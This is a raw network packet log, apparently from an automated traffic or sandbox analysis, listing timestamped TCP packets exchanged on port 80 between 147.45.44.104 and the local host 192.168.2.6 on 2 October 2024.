                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779452085 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779464006 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779483080 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779510975 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779612064 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779620886 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779632092 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779643059 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779649019 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779653072 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779663086 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779670000 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779674053 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779690027 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779715061 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779815912 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779863119 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779874086 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779891014 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779922009 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779942036 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779951096 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779963017 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779979944 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.780008078 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.820250988 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.820275068 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.820286989 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.820298910 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.820305109 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.820333958 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.820357084 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.823951006 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.823987961 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824022055 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824021101 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824050903 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824060917 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824075937 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824130058 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824173927 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824182034 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824215889 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824223995 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824259043 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824265957 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824299097 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824302912 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824332952 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824335098 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824367046 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824371099 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824399948 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824402094 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824433088 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824454069 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824467897 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824470043 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.824503899 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.829489946 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.829543114 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.829612970 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.829683065 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.829727888 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.829751015 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.829785109 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.829797029 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.829827070 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.829849958 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.829881907 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.829890966 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.829921961 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.829936981 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.829971075 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.829989910 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830024958 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830053091 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830070019 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830092907 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830106020 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830151081 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830156088 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830188990 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830199003 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830220938 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830229044 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830265045 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830271959 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830297947 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830310106 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830331087 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830339909 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830380917 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830380917 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830425024 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830430031 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830462933 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830470085 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830502033 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830519915 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830569029 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830569029 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830600977 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830605984 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830634117 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830636978 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830665112 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830667973 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830698013 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830701113 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830729008 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830734015 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830754042 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830761909 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830795050 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830797911 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830830097 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830874920 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830907106 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830912113 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830941916 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830941916 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.830977917 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831017017 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831053972 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831064939 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831098080 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831101894 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831130028 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831162930 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831168890 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831193924 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831202030 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831231117 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831336975 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831373930 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831427097 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831455946 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831473112 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831497908 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831506968 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831546068 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831553936 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831588030 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831590891 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831620932 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831624985 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831653118 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831656933 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831685066 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831688881 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831724882 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831732988 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831763983 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831773043 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831796885 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831800938 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831828117 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831852913 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831860065 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831866026 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831895113 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831896067 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.831935883 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.834712029 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.834764004 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.834780931 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.834793091 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.834801912 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.834827900 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.834844112 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.834886074 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.834892035 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.834923983 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.834928036 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.834964037 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.834973097 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835005999 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835007906 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835037947 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835042000 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835072041 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835076094 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835122108 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835122108 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835155010 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835158110 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835192919 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835202932 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835236073 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835238934 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835268021 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835300922 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835308075 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835333109 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835344076 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835366964 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835374117 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835402966 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835417986 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835454941 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835462093 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835494995 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835720062 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835762978 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835768938 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835803032 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835804939 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835834980 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835841894 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835874081 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835923910 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835956097 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835961103 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835989952 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.835992098 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836023092 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836026907 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836056948 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836057901 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836090088 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836137056 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836168051 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836174011 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836201906 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836205959 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836242914 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836257935 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836291075 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836296082 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836322069 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836327076 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836357117 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836359024 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836385012 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836393118 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.836421013 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.863547087 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.863600016 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.863599062 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.863652945 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.863658905 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.863703012 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.863734961 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.863737106 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.863774061 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.863775969 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.863826036 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.863873005 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.863877058 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.863909960 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.863914013 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.863941908 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.863950968 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864013910 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864044905 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864048004 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864067078 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864079952 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864088058 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864123106 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864129066 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864165068 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864175081 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864202023 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864204884 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864238024 CEST8049725147.45.44.104192.168.2.6
